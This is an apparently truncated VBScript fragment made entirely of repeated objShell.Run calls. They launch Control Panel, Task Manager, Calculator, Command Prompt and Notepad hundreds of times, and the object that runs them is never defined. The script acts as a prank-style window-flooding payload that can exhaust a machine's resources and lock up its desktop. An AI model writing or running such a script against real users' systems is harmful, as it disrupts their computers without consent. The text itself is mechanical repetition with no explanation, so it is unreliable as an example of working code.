objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

